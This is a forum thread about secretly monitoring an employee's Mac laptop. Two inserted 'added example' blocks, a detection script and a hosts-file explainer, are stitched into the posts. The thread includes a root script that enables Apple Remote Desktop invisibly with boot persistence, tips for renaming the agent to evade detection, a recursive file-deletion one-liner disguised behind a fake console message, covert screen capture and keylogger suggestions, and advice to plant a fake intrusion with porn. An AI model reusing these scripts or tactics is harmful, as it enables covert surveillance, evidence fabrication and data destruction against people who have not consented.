Grey Question... Hiding Remote Desktop or SSH
OK, we have someone at work who is believed to be "messing" around, i.e. downloading, chatting and even possibly damaging the company's integrity, whilst in the office.
The problem is they are a Manager who uses a full admin account on their laptop. Because sensitive information may be stored on managerial laptops we don't Remote Desktop or SSH to these laptops; if there's an issue we physically sit at the machine. I have been asked by a Director if I can report at any given point what applications that person has running or what they are doing. The problem is this person is fairly computer literate, and turning Remote Desktop on and not showing when it is active isn't really inconspicuous enough to gather proof. Does anyone have any suggestions?
SSH is completely transparent to the console user, but if he knows it's supposed to be turned off it's really obvious that it's been changed. I've never used ARD, but VNC server is invisible IF it's started from the Terminal. I do this regularly at my office (the staff aren't evil, they just don't read instructions). You can detect VNC from the Terminal easily.
There are several keyloggers and screen capture programs for OS X - start at VersionTracker. Some of them pop up a small window until you pay for them, but the shareware fees shouldn't bankrupt you. How well they hide is an issue. Is he likely to poke around in the background processes? Intercepting the mail/net traffic too? Don't need anything on his laptop for that. If I were in your place, I would make it look like his machine had been hacked by a 3rd party - e.g. a hidden account named "0vvn3D" containing either a Star Trek site or gay porn - something that the observee would never suspect you of. Naturally keep the Directors in the loop.
The cleanest approach would be to listen to the traffic via the diagnostics port of the switch, that way you don't even have to touch the machine.
Also be extremely careful to get full cover for what you do (in writing; the whole thing has decent chances of ending up in court one way or the other) and if in doubt about the legality of what you're about to do, consult a lawyer. The Eichmann defense (they told me to kill them) doesn't work. Preferably all you do should not only be legal, but also covered by company policy. Finally, note that you'd better be on the winning side of this story or you may be looking for a new job real soon... You should at least consider the possibility that the guy who asked you is trying to frame the manager for stuff that might not be work-related, and key loggers and other intrusive tricks can't tell private and company use apart, so this is a really tricky subject. Perhaps suggest they hire a PI instead; that way you're out of the loop entirely.
Thanks for all the comments...
Quote:
This does interest me. When you say switch, do you refer to the router? Our switch is a rackmounted Netgear 10/100 switch. The router is a DrayTek 2800, which also acts as the DHCP server.
Quote:
The company lawyer is a good idea. And you said A Director? Singular? How many are there and are they all involved? If this is all legit then the Director shouldn't have any problems sitting down with you and the company lawyer. Record the meeting.
Quote:
It's dangerous and may be ethically and legally very, very borderline, if not beyond. A company lawyer will also place the company's interest before those of digitaljunkie, who should make sure to have a very precise understanding of the legal framework for doing this kind of stuff.
Quote:
Most rack-mounted models are managed; read the documentation and you'll most probably find some very interesting features for your purpose. Again, be really careful about politics and legality: it's you, not one of them, who's gonna be sued, fired or both.
the magic script ;)
run with sudo:

Code:
```bash
#!/bin/bash
### start ARD with all privileges for all users
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent

### edit /etc/hostconfig so ARD isn't checked in the Sharing pref pane
### badly need some delay here in order for ARD to start correctly and ports 3283 and 5900
### to be opened correctly; I have tried with many different values, over 15 seems to be
### working 100% of the time, made it 20 sec to be sure
sleep 20
sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2
mv /tmp/output2 /etc/hostconfig

### modifying /etc/rc so ARD is started in stealth mode at every boot
sed 's/exit 0//' < /etc/rc > /tmp/output1
echo "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent" >> /tmp/output1
echo "sleep 20" >> /tmp/output1
echo "/usr/bin/sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2" >> /tmp/output1
echo "/bin/mv /tmp/output2 /etc/hostconfig" >> /tmp/output1
echo "exit 0" >> /tmp/output1
mv /tmp/output1 /etc/rc
exit 0
```

*cough* I'm not responsible for whatever you do with that; educational purposes only.
Quote:
Code:
#!/bin/sh
hayne, let's please not suppose our guy is a shell scripter ;)
PS: Thanks for bringing the Light side anyway :D
Quote:
perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig
Maybe you want to add this to the process, but watch the timing as it will take a while to finish. Should only need to be done once, perhaps at reboot with a Console Message "Optimizing File System" to cover the scanning.
nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm
Quote:
:)
If the guy's smart enough to do that, then we can all go home. He'll notice any monitoring and will be covering his tracks.
Quote:
I'm such a noob, lol. Thank you a thousand times :)
Quote:
mv ARDAgent smbmount <substitute any unix-sounding name that isn't being used. Real utilities that aren't used on that box, like `named`, will hide well.> Then adjust references to ARDAgent to the new name in fenrack's script, /etc/hostconfig and Startup Items. With a small amount of work, you can bury it so deep only forensic analysis will find it. Or a port scanner. If ARD doesn't like having its process name changed, VNC Server doesn't care.
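The detection side of the kickstart script and the "port scanner" remark above, as an added example that is not from the thread: a POSIX shell script that reads `netstat -an` style output and a startup file and flags (a) local sockets bound to 5900 (VNC/ARD control) or 3283 (ARD reporting), (b) kickstart or ARDAGENT lines appended to /etc/rc, and (c) an /etc/hostconfig that says ARDAGENT=-NO- while those ports are open, which is exactly the state the script leaves behind. The netstat excerpt and rc tail are constructed samples embedded so it runs offline; `audit_host` applies the same checks to the live machine, using the Mac OS X paths the thread names (an assumption, since other systems keep these files elsewhere).

```shell
#!/bin/sh
# Added example (not from the thread): spot a "stealth" ARD/VNC setup from the
# Terminal. Runs on constructed sample text so it works anywhere; audit_host
# applies the same checks to the machine it runs on.

# Constructed `netstat -an` excerpt: one VNC listener, one ARD UDP socket, and
# an unrelated outbound connection *to* someone else's 5900 (must not count).
SAMPLE_NETSTAT=$(cat <<'EOF'
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  *.5900                 *.*                    LISTEN
tcp4       0      0  *.22                   *.*                    LISTEN
tcp4       0      0  192.168.1.20.49153     10.0.0.5.5900          ESTABLISHED
udp4       0      0  *.3283                 *.*
udp4       0      0  *.5353                 *.*
EOF
)

# Constructed tail of /etc/rc after the thread's script has appended itself.
SAMPLE_RC=$(cat <<'EOF'
ConsoleMessage "Startup complete"
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -quiet -agent
sleep 20
/usr/bin/sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2
exit 0
EOF
)

# count_ard_listeners: netstat -an text on stdin; print how many *local*
# sockets are bound to 5900 or 3283. Only the Local Address column is
# examined, and TCP entries must be in LISTEN state.
count_ard_listeners() {
    awk '$1 ~ /^(tcp|udp)/ && $4 ~ /\.(5900|3283)$/ && ($1 ~ /^udp/ || $6 == "LISTEN") { n++ }
         END { print n + 0 }'
}

# find_stealth_rc: print the lines of a startup file (stdin) that invoke the
# ARD agent or rewrite its hostconfig flag; exits 1 if there are none.
find_stealth_rc() {
    grep -E 'ARDAgent|ARDAGENT|kickstart'
}

# check_hostconfig HOSTCONFIG_TEXT LISTENER_COUNT: the script sets
# ARDAGENT=-NO- so the Sharing pane looks clean while the agent still runs;
# "off" in hostconfig plus open ports is the tell.
check_hostconfig() {
    if printf '%s\n' "$1" | grep -q 'ARDAGENT=-NO-' && [ "$2" -gt 0 ]; then
        echo MISMATCH
    else
        echo OK
    fi
}

# audit_host: run the checks on this machine (Mac OS X paths assumed; files
# that do not exist are skipped).
audit_host() {
    n=$(netstat -an 2>/dev/null | count_ard_listeners)
    echo "ARD/VNC listeners: $n"
    for f in /etc/rc /etc/rc.local /etc/hostconfig; do
        [ -r "$f" ] && find_stealth_rc < "$f" | sed "s|^|$f: |"
    done
    if [ -r /etc/hostconfig ]; then
        echo "hostconfig vs. listeners: $(check_hostconfig "$(cat /etc/hostconfig)" "$n")"
    fi
    return 0
}

# Demonstration on the constructed samples.
n=$(printf '%s\n' "$SAMPLE_NETSTAT" | count_ard_listeners)
echo "sample listeners: $n"                                            # 2
printf '%s\n' "$SAMPLE_RC" | find_stealth_rc | sed 's/^/rc: /'
echo "sample hostconfig: $(check_hostconfig 'ARDAGENT=-NO-' "$n")"     # MISMATCH
```

Run `audit_host` as root from the console of the laptop itself; a listener on 5900 with no corresponding entry in the Sharing pane is the inconsistency the thread's script depends on nobody noticing, and renaming the agent binary (the next suggestion in the thread) does nothing about the open ports.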
Just discovered this one - secret screen captures from the shell:
Code:
screencapture -mx filename.pdf
-m: main monitor; -x: no audio. About 80 KB per capture; they would need to be copied off fairly regularly.
OK, I'll have a play with those, thanks peeps.
I noticed a wireless network that's unprotected and it appears the person is using that for MSN as well. Is there any way to prevent their laptop from joining said specified network without actually locking it down?
Yes, but WLAN is even easier to tap than Ethernet, so why would you do that?
Find out whose wireless network it is and give them a courtesy call. Bring donuts.
OK, well, solution almost fixed: we simply had the wireless locked down and made our firewall rules more strict!
But is there any way to stop them accessing email through an email client such as Mail? I don't seem to be able to block that kind of access as email all runs on the same protocol (ports), i.e. they may access Hotmail through a mail client such as Mail, Thunderbird, Entourage etc. etc... Thanks
You can block individual hosts/sites through DNS. See the local guru if you are running your own server, or just use the /etc/hosts file:
Code:
12.34.56.78 hotmail.com www.hotmail.com
hotmail will go wherever you want it to go ;) The double listing is there 'cause it's a little narrow-minded about what matches.
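Why the double listing is needed, as an added example that is not from the thread: a small POSIX shell imitation of how the resolver reads /etc/hosts (comments stripped, case-insensitive, first matching line wins, exact names only, no wildcards or suffix matching). The hosts file content and the 12.34.56.78 sinkhole address are constructed for the example; `hosts_uncovered` lists which of a set of names would still fall through to real DNS, i.e. the gaps in the block list.

```shell
#!/bin/sh
# Added example (not from the thread): what a name gets from /etc/hosts, and
# which names a sinkhole entry does NOT cover.

# Constructed hosts file with the thread's double-listed sinkhole entry.
SAMPLE_HOSTS=$(cat <<'EOF'
##
# Host Database
##
127.0.0.1       localhost
255.255.255.255 broadcasthost
::1             localhost
# sinkhole: bare name and www. form listed separately, there are no wildcards
12.34.56.78     hotmail.com www.hotmail.com
EOF
)

# hosts_lookup NAME: hosts file on stdin; print the address NAME maps to the
# way the resolver does: comments stripped, case-insensitive, first matching
# entry wins, exact name only (mail.hotmail.com does not match hotmail.com).
hosts_lookup() {
    awk -v want="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        { sub(/#.*/, "") }
        NF < 2 { next }
        { for (i = 2; i <= NF; i++) if (tolower($i) == want) { print $1; exit } }'
}

# hosts_uncovered NAME...: hosts file on stdin; print the names that have no
# entry and would therefore still be resolved by real DNS.
hosts_uncovered() {
    hosts=$(cat)
    for name in "$@"; do
        [ -z "$(printf '%s\n' "$hosts" | hosts_lookup "$name")" ] && echo "$name"
    done
    return 0
}

# Demonstration on the sample.
printf '%s\n' "$SAMPLE_HOSTS" | hosts_lookup www.hotmail.com                      # 12.34.56.78
printf '%s\n' "$SAMPLE_HOSTS" | hosts_uncovered hotmail.com www.hotmail.com mail.hotmail.com
```

Every hostname the mail client actually contacts has to be listed on its own, which is the "narrow-minded" matching the post refers to. Also note this only affects the machine whose hosts file is edited, and that file is plain text an admin user can open and revert; the DNS-server route mentioned first applies to every client on the LAN.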
Site design © IDG Consumer & SMB; individuals retain copyright of their postings
but consent to the possible use of their material in other areas of IDG Consumer & SMB.